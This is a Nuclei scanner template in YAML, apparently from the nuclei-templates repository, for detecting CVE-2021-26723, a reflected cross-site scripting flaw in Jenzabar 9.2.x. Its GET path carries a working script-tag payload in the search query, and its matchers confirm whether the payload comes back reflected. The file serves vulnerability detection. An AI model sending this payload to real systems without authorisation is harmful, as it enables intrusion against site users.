nuclei-templates/cves/2021/CVE-2021-26723.yaml

34 lines
918 B
YAML
Raw Normal View History

2021-02-07 15:41:09 +00:00
id: CVE-2021-26723
info:
name: Jenzabar v9.20-v9.2.2 XSS
author: pikpikcu
severity: medium
2021-03-24 06:48:11 +00:00
description: Jenzabar 9.2.x through 9.2.2 allows /ics?tool=search&query= XSS.
reference: |
- http://packetstormsecurity.com/files/161303/Jenzabar-9.2.2-Cross-Site-Scripting.html
- https://gist.github.com/Y0ung-DST/d1b6b65be6248b0ffc2b2f2120deb205
- https://jenzabar.com/blog
- https://y0ungdst.medium.com/xss-in-jenzabar-cve-2021-26723-a0749231328
2021-02-07 15:41:09 +00:00
tags: cve,cve2021,jenzabar,xss
requests:
- method: GET
path:
- "{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header